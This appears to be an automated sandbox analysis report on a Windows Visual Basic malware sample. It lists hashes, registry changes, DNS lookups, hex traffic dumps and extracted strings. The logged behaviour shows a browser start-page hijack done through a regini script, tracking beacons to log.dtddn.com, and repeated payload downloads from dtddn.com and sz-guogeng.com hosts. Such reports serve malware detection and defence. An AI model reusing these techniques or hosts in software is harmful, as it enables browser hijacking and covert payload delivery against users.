Analysis Date: 2014-10-06 05:45:58
MD5: 05191b2ecab34bd0ac3ca13778e61e53
SHA1: 5133f71e232ae0105599e51a0b4f28aa9bb0eabb

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 1a1a44ea0fa3dca86d130d4c6551eee9 sha1: b7d0bae270286fe72d68aded3fe88c860d1bbf5d size: 151552
Section: .data md5: 620f0b67a91f7f74151bc5be745b7110 sha1: 1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d size: 4096
Section: .rsrc md5: 4c32753526eba097f199dae097fe396d sha1: b7c7b12d981e9d3217f3bacaccbb1840cf6ff7bb size: 4096
Timestamp: 2014-09-18 08:05:12
Packer: Microsoft Visual Basic v5.0
PEhash: 45eb20b78863b93f367f98b463cc9c92806527d3
IMPhash: 156c96095b95a903a0c052dfee999647

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\VB and VBA Program Settings\u2p\m0q\Edit ➝
3101\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\ ➝
C:\Program Files\Internet Explorer\IEXPLORE.EXE "http://www.skoda-china.com/"\\x00\\x00\\x006\\x009\\x00-\\x00A\\x002\\x00E\\x00A\\x00-\\x000\\x008\\x000\\x000\\x002\\x00B\\x003\\x000\\x003\\x000\\x009\\x00D\\x00}\\x00\\\x00s\\x00h\\x00e\\x00l\\x00l\\x00\\\x00O\\x00p\\x00e\\x00n\\x00H\\x00o\\x00m\\x00e\\x00P\\x00
Registry: HKEY_CURRENT_USER\Software\VB and VBA Program Settings\u2p\w2m\copin ➝
828210703197\\x00
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\98937.ini
Creates File: \Device\Afd\AsyncConnectHlp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\98937.ini
Creates Process: C:\WINDOWS\System32\regini.exe "C:\Documents and Settings\Administrator\Local Settings\Temp\98937.ini"
Creates Mutex: up3101
Winsock DNS: down.dtddn.com
Winsock DNS: log.dtddn.com
Winsock DNS: down.sz-guogeng.com
Winsock DNS: dldir1.qq.com
Winsock DNS: lnk1.dtddn.com
Winsock DNS: lnk2.dtddn.com

Process
↳ C:\WINDOWS\System32\regini.exe "C:\Documents and Settings\Administrator\Local Settings\Temp\98937.ini"

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Start Page ➝
http://www.skoda-china.com/\\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page ➝
http://www.skoda-china.com/\\x00

Network Details:

DNS: log.dtddn.com
Type: A
112.124.183.10
DNS: lnk1.dtddn.com
Type: A
112.124.120.200
DNS: lnk2.dtddn.com
Type: A
112.124.120.200
DNS: dldir1.qq.com.cdngc.net
Type: A
174.35.56.186
DNS: dldir1.qq.com.cdngc.net
Type: A
174.35.56.217
DNS: down.dtddn.com
Type: A
112.124.120.200
DNS: down.sz-guogeng.com
Type: A
112.124.120.200
DNS: dldir1.qq.com
Type: A
HTTP GET: http://log.dtddn.com/UpLog2/worklog.asp?Name1=3101%20A%20251&Info1=828210703197%2077734
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://log.dtddn.com/UpLog2/worklog.asp?Name1=3101%20A%20251&Info1=828210703197%2081062
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://log.dtddn.com/UpLog2/worklog.asp?Name1=3101%20A%20251&Info1=828210703197%2084156
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://lnk1.dtddn.com:7771/lnk/9804.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://lnk2.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://lnk1.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://lnk2.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://lnk1.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://lnk2.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://lnk1.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://lnk2.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://lnk1.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://log.dtddn.com/UpLog2/worklog.asp?Name1=3101%20Q2-Beg1&Info1=828210703197%201%200
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://down.dtddn.com/74.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://down.sz-guogeng.com/74.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://log.dtddn.com/UpLog2/worklog.asp?Name1=3101%20Q2-DownI&Info1=828210703197%201%200%201
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://lnk1.dtddn.com:7771/lnk/2516.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://lnk2.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://lnk1.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://lnk2.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://lnk1.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://lnk2.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://lnk1.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://lnk2.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GET: http://lnk1.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Raw Pcap
0x00000060 (00096)   74747052 65717565 73742e35 290d0a48   ttpRequest.5)..H
0x00000070 (00112)   6f73743a 206c6e6b 322e6474 64646e2e   ost: lnk2.dtddn.
0x00000080 (00128)   636f6d3a 37373731 0d0a436f 6e6e6563   com:7771..Connec
0x00000090 (00144)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000a0 (00160)   0d0a0d0a 0a742e35 290d0a48 6f73743a   .....t.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f363332 2e726172   GET /lnk/632.rar
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000030 (00048)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000040 (00064)   28636f6d 70617469 626c653b 2057696e   (compatible; Win
0x00000050 (00080)   33323b20 57696e48 7474702e 57696e48   32; WinHttp.WinH
0x00000060 (00096)   74747052 65717565 73742e35 290d0a48   ttpRequest.5)..H
0x00000070 (00112)   6f73743a 206c6e6b 312e6474 64646e2e   ost: lnk1.dtddn.
0x00000080 (00128)   636f6d3a 37373731 0d0a436f 6e6e6563   com:7771..Connec
0x00000090 (00144)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000a0 (00160)   0d0a0d0a 0a742e35 290d0a48 6f73743a   .....t.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f363332 2e726172   GET /lnk/632.rar
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000030 (00048)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000040 (00064)   28636f6d 70617469 626c653b 2057696e   (compatible; Win
0x00000050 (00080)   33323b20 57696e48 7474702e 57696e48   32; WinHttp.WinH
0x00000060 (00096)   74747052 65717565 73742e35 290d0a48   ttpRequest.5)..H
0x00000070 (00112)   6f73743a 206c6e6b 322e6474 64646e2e   ost: lnk2.dtddn.
0x00000080 (00128)   636f6d3a 37373731 0d0a436f 6e6e6563   com:7771..Connec
0x00000090 (00144)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000a0 (00160)   0d0a0d0a 0a742e35 290d0a48 6f73743a   .....t.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f363332 2e726172   GET /lnk/632.rar
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000030 (00048)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000040 (00064)   28636f6d 70617469 626c653b 2057696e   (compatible; Win
0x00000050 (00080)   33323b20 57696e48 7474702e 57696e48   32; WinHttp.WinH
0x00000060 (00096)   74747052 65717565 73742e35 290d0a48   ttpRequest.5)..H
0x00000070 (00112)   6f73743a 206c6e6b 312e6474 64646e2e   ost: lnk1.dtddn.
0x00000080 (00128)   636f6d3a 37373731 0d0a436f 6e6e6563   com:7771..Connec
0x00000090 (00144)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000a0 (00160)   0d0a0d0a 0a742e35 290d0a48 6f73743a   .....t.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f363332 2e726172   GET /lnk/632.rar
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000030 (00048)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000040 (00064)   28636f6d 70617469 626c653b 2057696e   (compatible; Win
0x00000050 (00080)   33323b20 57696e48 7474702e 57696e48   32; WinHttp.WinH
0x00000060 (00096)   74747052 65717565 73742e35 290d0a48   ttpRequest.5)..H
0x00000070 (00112)   6f73743a 206c6e6b 322e6474 64646e2e   ost: lnk2.dtddn.
0x00000080 (00128)   636f6d3a 37373731 0d0a436f 6e6e6563   com:7771..Connec
0x00000090 (00144)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000a0 (00160)   0d0a0d0a 0a742e35 290d0a48 6f73743a   .....t.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f363332 2e726172   GET /lnk/632.rar
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000030 (00048)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000040 (00064)   28636f6d 70617469 626c653b 2057696e   (compatible; Win
0x00000050 (00080)   33323b20 57696e48 7474702e 57696e48   32; WinHttp.WinH
0x00000060 (00096)   74747052 65717565 73742e35 290d0a48   ttpRequest.5)..H
0x00000070 (00112)   6f73743a 206c6e6b 312e6474 64646e2e   ost: lnk1.dtddn.
0x00000080 (00128)   636f6d3a 37373731 0d0a436f 6e6e6563   com:7771..Connec
0x00000090 (00144)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000a0 (00160)   0d0a0d0a 0a742e35 290d0a48 6f73743a   .....t.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f363332 2e726172   GET /lnk/632.rar
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000030 (00048)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000040 (00064)   28636f6d 70617469 626c653b 2057696e   (compatible; Win
0x00000050 (00080)   33323b20 57696e48 7474702e 57696e48   32; WinHttp.WinH
0x00000060 (00096)   74747052 65717565 73742e35 290d0a48   ttpRequest.5)..H
0x00000070 (00112)   6f73743a 206c6e6b 322e6474 64646e2e   ost: lnk2.dtddn.
0x00000080 (00128)   636f6d3a 37373731 0d0a436f 6e6e6563   com:7771..Connec
0x00000090 (00144)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000a0 (00160)   0d0a0d0a 0a742e35 290d0a48 6f73743a   .....t.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f363332 2e726172   GET /lnk/632.rar
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000030 (00048)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000040 (00064)   28636f6d 70617469 626c653b 2057696e   (compatible; Win
0x00000050 (00080)   33323b20 57696e48 7474702e 57696e48   32; WinHttp.WinH
0x00000060 (00096)   74747052 65717565 73742e35 290d0a48   ttpRequest.5)..H
0x00000070 (00112)   6f73743a 206c6e6b 312e6474 64646e2e   ost: lnk1.dtddn.
0x00000080 (00128)   636f6d3a 37373731 0d0a436f 6e6e6563   com:7771..Connec
0x00000090 (00144)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000a0 (00160)   0d0a0d0a 0a742e35 290d0a48 6f73743a   .....t.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....


Strings
.07SS.

0rDN+5euV9eZJre2653K69eu05DDMCdaV/4DR9e2FI
0/zGJ9sNAdQ63Qe
19rxU5rvXPzhaI+
1fgTfhc9
1LtA6lDollh1M9s94HlXMlhS9KDZEOE+SZlSldlpfKlpEA7M99h5uJEYV4hSXdAHuZv/FAI7Fo9bv5k7g1k7vyk7v5k5glU
2DOxCf0QffR2dbebNBfAdfRqbT0gaGaEqgfqfVfwpTfwaxWdbbRz4Ua+tNRqST0O4C0wNo34IlkTMQssIAMsIAbsIAcsI/Ra
3Bcp30
3Bw4E7wdBBwRCB72CBElCBXpCRFzIJFzxoUzUBwoUywLBB6HCBEPCiWzCAXzWy8zgJU4aMwoQ7wbBBw2CBwzCBwzC9fzCBwz
3LAxeshq3beroz07XpuLrM0UhxsYhyMB5Ten5TFBrIuBh9
3M3r9y
3rs/4HpN
4AOSnyvC4fnUE79aUT2IUo93Jy2Vsy9tQ3l1Q3l1Q3l5Q3l1QHA1Q3l1FJl1Q3l5QJl1Q3l1Q3l1Q3l9/n9u6SnbDy9zUSnc0j2LDZoaDiE
4j92TXNV7WKHTolETZlHAX7EDYH4/89i
4r42ufo9P+
4t5Qnt9Njx5nTyANIki6FDsaUka1IvaLFP9nqKi6FxAvnDsEjx51jl+aFkgD4X
5Heg
5JPclskH1ue81ZPhqzkv
5Okqk6xivpuw
5O/Ktd/0OO/zaOd4aOtcaO3IazVksRVkW8qkqO/RpO/7OO/LaOpkaOlkafkkaEpkFwqKqv/8td/tqZ/kaOtZaO/kafZ
6QJx
6RsXKK4qRH46RNSUIRsq
826MU9
8dP2Uu
8DpktMgUtqv
+8O7+oCa+O
8WSdiRvTc+ob1YXbkBD
9fbPNtd8sj
9RgdEAW
a2dLXZluzT
aavkgwevkufjqkjuopuyufcuy
acoodqedxdosipnlochxtwyfomvetalxbmhujospkvmwdyjvodrdwylrk
adfvyihkbvrycukmomefk
aeqxfymfnzmpjvvkmnmujpg
agtmuhbm
ahilnxqrernfrgultlbzqwitoaptausynvpipzxthjft
aIhkPA19JECcJk1CWpCMap3kzkCZmLx/+zX5zInK+/XZVw1ytkbXfLx5Vy35tockuvcRf/X5V5bC+P5B
AjbeY69ky0YEYeY3oN9EydK
akdzmtloq
akfhleddfrhflxw
akradhir
alkcwqhsufkbmpmmtkjrlflkdznploledjnjztozccwnyhncavv
anljxasut
aPfS5bf9
aqs73QeywzefwQim8osLwQ3A5qh
Arguments
arikGdoltV9P6B
AST7zR32O2iu1B4
atndczntentouoefpkpz
aUkhnrbsZepuZhbpJTpfaTBhEhpNYw1ygERtEUHvgyRNLGbjohFR3w1tLjBto5uhPMu+3yRtLtFpgntDfh+0fWgIi5lFs4lFpalFial0ste
Avop
axpgbbcbym
aycpcnsnxyzqlhozray
aynytpvlcnamqyzoyb
azrhypjhnsozxudbxgi
b7QPbZ6zVT4yj73SO0
bA8n8QX5
B*\AD:\ykwixT8CGnu2Lh5\kmiqabbt.vbp
badzqbifitepcgc
BaQuWcvrh5Q4IZ3lDaC2icQWMZd0Wp3g+5n4Badlicef+pe4DaeAWcvoWpefBQQFIZENDav2iZq0IQu
BAqw
bbevgjptpqyukijhpatuzcohousfecnbouxotbhbijrnnqcpcimchavpsxfcbffemlewohtw
bbvixbicfrjgmbixtazmlpwrdfyfajwliznzvozecjxfzxukhxmz
bbvlkxnzqlkfkpaorqypo
BFs2FnRG
bhpt
bnrafuhmtfusdhuknupmdhtzhttlrgoohtsvrvicbxmulucmpwhukdqwkwvtujvbevpxunf
boeLBNecKoeWoo1c8o7g821u8IyL8NeLo+eQ7ceEloeL8oej8oeL88
bomzalvq
bpgleae
bqripqqjvzxvoqgouzfkekkxknlzneknenfyhiexsmnshtdrvpmdbtiqfzvsgmrfkibhvmwfeovgj
brlowngrgfotkf
brmd
bRtYr8795
btjmmmjsnkaeqfqstonkrcyolqkewmflluqrflxyycrbnrhraibixdlsjqmjcdgugzlxemoyqlozfroj
bToZ
bukinigswzp
BUSYJUMVB2
bvntxewubaxortytpzwbq
BYhpjYhi4XhzXXxs4Xqh4XFm4a6OqxhOKBhO+XhxqXhH4XhI4Xqb4XSm4jvOqivOzXhO+xhx4XhH4XhI4XqO4X6O4avO4RhOKXhOgRhx4Xh74XhI4XHO4XFq4aTO4RhOKhhO+xhw4XhHXXhy4XqO4X6O4aTOqx/OKXhOgRhxqXh74XhI4XHO4X/q4avOqxhOKXhOvRhw4XhH4Xhm4Xq74X6O4aTOqx/OK6hOgRhxqXhHgRx94XHO4X/O4jvOqxhOzXhO+xhx4XhH4XhI4XqO4X6O4aqOqxBOzXhOvxhxqXh74XhP4Xqg4XSq4jvOqxBOKWvONXhw4XhHXXhm4Xqh4X6O4avO4RhOKhhO+xhw4XhNXXhP4XHO4X/q4avOqxhOKXhOvRhw4XhHXXhI4XqO4X6O4aTO4RhOKBhOgRhx4Xh74XhR4Xqh4X6O4aqOqxBOzXhO+XhxKXhdXXhm4Xq74X/I4KBO4RhOKBhOgRhxqXh74XhP4XqO4X/O4avOqxhOzXhOvxhxqXh74XhR4Xqh4X6O4aTOqhBOKYhOgRhxqXhDXXxn4XHO4X/q4jvOqxBOzXhO+xhx4XhH4XhI4XqO4X6O4aqOqxBOzXhOvxhxqXh74XhP4XqO4X/O4avOqxhOzXhOHxhx4XhH4Xhm4Xqh4X6O4a6O4RhOKXhOgRhwNxhHXXhm4XNn4X/q4jvOqx/OzXhO+Yhw4XhH4Xhm4Xqh4X6O4a6O4RhOKYhOgRhxKXh74Xxn4XHO4XSq4jvOqh6OzXhO+xhw4XhDvRhm4XhO4agOqXhO4KRJ
c3EAFCg3z8
C64GX8b7Hhg7mON87
canyxj
cbstvhbqwqnsqggdezhr
Ccm67A
cfjuyycrhleirhrpaktx
Cg97VGjy68YJV
cHDh3a3Q1ho1ozo2EHo23sYCcc9Pwm3Srd91bzsOwhMy
chppbdxmhmyclhspqwddhrmegaxsbrropkscvgatzzmrqxfnesrgkuphnolgpltcdcoeifasymjemticsreori
cicqvjjjiydfjcjdlhsezynxwnwdilcdqmzrbqscofdwcvxweanffurwtyxzpnvqtebzzxuantckome
clhqtdrpbytxhybeasqysmnxx
cluldwqjqqttndocoigwbtyhsnkrqcnvssvffhbkgqjkercjgvyfufqzkunoil
cMOyJog5psvDJtCAvsvk7sT5
cmybcfnceabxipchocs
CNR0+a+Te0WeWYWnFNWn+IUkCCXdjc+5ubXeCYUSuNtnGq+d
cocedrydqxboebidfgbotvmdkbtglfnhzj
cqebuuyldrhjssyagsijcdr
CQxxqnMemed
CreateShortcut
crhv
CRPptSmwCdMjtSb2s5M6/S8Ytl
cryritdfehwgvkcwemun
CUSTOM
cuwxpbrtxfgluerkcnrwhvgkrp
cvHONghPNv2
cwjatlmzgbjjdqftfvtosveyfeiihueijybdwypridwbvdruggneolqzgfxysfu
cxjxbmlspdmfiaj
cxqidoaermqnfnjogwawbkqfriboygwowhass
cyfcdsdtwjewlfct
czifclgni
czmrgtsfwogmphgplfsdfrqp
D2KzxSj2x2Kbyyd39N5
D72kN4Z3GM9Z28N36k
dA78hg7YAA7QqAgVqAhcqABFqQ5Ma/5MXP2M2A7YKv7HqAYBqA27qCxnqiLMa/2MdW78hA7gqA75qAgvqAhvqWyFqnXM1wMMOP2MqA7MqA7qqA7MqAgufq
dbmvffxygcismqeimynoyknyol
dfaumgllukstgotgljthnc
dgpfrx
DGyWFK+BKKxDkS7SqCKMkKxbS5+vHoH8bvKbKZKVL5KVHWPkSSxN1EHijqxbKZWXkvW4jD/10XI5hBQQ0MhQ0MSQ0MtQ04xH
dheunyimblithndqhahigxsaqpmiwxgpgzrhewksojvadlehonflupkdimkosopwcrjohznqglynbynuvkwbvmx
djgn
dmqklyxis
Dn/gTMApdng
dnow
dohiskqkxdbhrpakcnlnruv
dootplfvmqrk
dOvyOiDu
DoWun1TJg8
doyfrulocdczqzlvrcmothuksyq
+Dqh
dqnxcoowxumimdxyujgivcmkatlbacmntifkubbjpizptbgojmjpnqayonoospuntnknmismnbmngtybhbidmcr
dskunfyqxhejroebcgyjmnnplpsnwiiulvnxbrmekermvbbefol
DtrbJdziyX6wyDy/fZU
dvwdmumhazjdxrchpwhrgpjpqhv
dzgrwatu
dzxkkfmqdywjtbyxcybjjbaehsmistpomcgifiedgmaxhpydllpwjhnruajlvtxg
E306rI7O840y
ebhncgeabvedjrja
eceqtlobxropyukhrfseiztflpchmjivquhwlystaobwuxhpguhexzedjnporoygtsjdwnems
ecqwxjutdozuxc
eDuX5i56O8dRC89Lcq2vr0WV4
EDZB30r8sr580b1R2vR3a
EFRlETtx7y
egrahwykyfgofrulucmlr
eHJgey1HIHJX
ehosoeytdmigieckvmdskunfebnhuthujbsgzecjtmxaixwinlgvcibxwa
EJmAEg
EJUMALU3es8bASe1LlU6wcn8an
eJWsUePEpAMXFAQmU0
ekobgpblyzipajufxycpudpfiimzpskumcmzesuersbntmyiaradywiivmksilssfbfsnlhmkvemwagltktalu
ektudvwgyznzjkllidmtcefacywslzzowhqvkdezvftzetzovgcoyhenkthddsshdtwnybxuhxbdtghwrwqxb
emrn
enppmnreuhyjmqjxsawczlylrjwqouiqrelvszykgzkenjyjftzjrnmoonzdbxbidsoxgwlcnryrkwpxsadnkvascarhykp
eoRQCiytE/RN9GhcmogariRC+i+cE/+crRygbbIupwr5seICDNmQOoluOobu6XmQvNoMvTOylYNJv5ou6bbyOZCJv5zuvZxyl8N
eosvtmqve
ephjewcgjomtdqhfxnrhcvrurcligpqpcikmgauzwbqmmjpo
EPm2z1gledIfoPH
epsxrekiodldcoerjtwcgiomsnwwkxdvhckgvchbiheazmmlwqzv
EQK0AgAcR0wRlJ6+R0KSkQIM5L6HAXwpk0wMULwDRXdxR0wp5LmcTJD
erttpmgthwsbzq
erumpqpgmmshjxthbflqervlcx
esdrreehunxdlybmdhbae
esyybrgixbinpwkc
etfpbxlnznujrrqsshudpwpmdcnhfvqiimwgyefrmuqqjazzkdugjptgbipexyiakmotlhlpktfevwajzctxkgadyhddklpc
ezcnxnygsilshjzvnrkxabxusxlloagzrweqyfrzzzxndlvs
EZfePSyLfRysEEgxvEfJvsP0v0ne70feEJyi9RyWrty6EEgcvEfNvsP+vmeeDtMesJyirtyWGtymHRgmvEJyvsPev0fe7JyesJyirtyW7EyovEgCvEwVvJM7v07e7UOeodfiFSyLfRysvEgqvEwRvJM+vdae757eHtyioRyL7EyJEEg2vE6gvsg+vmPeDtcesMyibEyLfRyCvEgUvEwzvJn7vMye7RJes0fiFtyLfRyPEEgmvE6mvJn7vdMeDtceoJyirtyWJEyovEgzvEwRvJnevdaeDLfeCLfiFRyYEEyTEEg5vEyevZg0vEyevCR/
F1ygPH9VewiUDv87sKM1tZ0DI
fbbqaagyxrvskdxru
fdetvfzazsycpuipzmxgzzcti
fecpzctxmtkkznanodjayftgbxz
fedi
fezybokoqazqfolpequdhxrbqmxluigqxdydirpfkbmldpgobujhlmbqfosuehurarcpimchsdcvxoyfjwcubqb
FhSzx8XNL/kxdx3mMi6q4WN4LGZW
fjmhoffyaeuutfuyj
fjrqgfenuuscowmcwqkbe
fkszkomrcmikrdae
flov
fnRyF1uZenoY8CzIbnR1
FOEBQxmTxxCFXGDG8txcXxC5GzmVY4Y25Vx5xSxlvzxlYBRXGGC+/pY9b8C5xSBWXVBZbF3/dFKtMT5qdcOqdcLqdc5qdZBY
fojpydoqcsfispmekktsiivrwh
fomdwzeyftmilijiudghgdtcnibmwinbydq
fotdvsmjswccgxbohvmyvrbxhprgubqsiprqjvzxveqwuujfvypqjpolksu
FP9J
fsikmmzfzcwfrroutgwzalojnagekzionpvnzzsymput
fvjbyorjr
fvltdarwfbpfbzlrjadkqtlleutgui
fwjgqukjbvdqgyuyvkifpmjyqjceyntn
fzhwdkyrhulgoenagkaqdynuvtkfrnhkynjsgmbijwddggayyqdduapxngccfrercbhwkapbrvrqujd
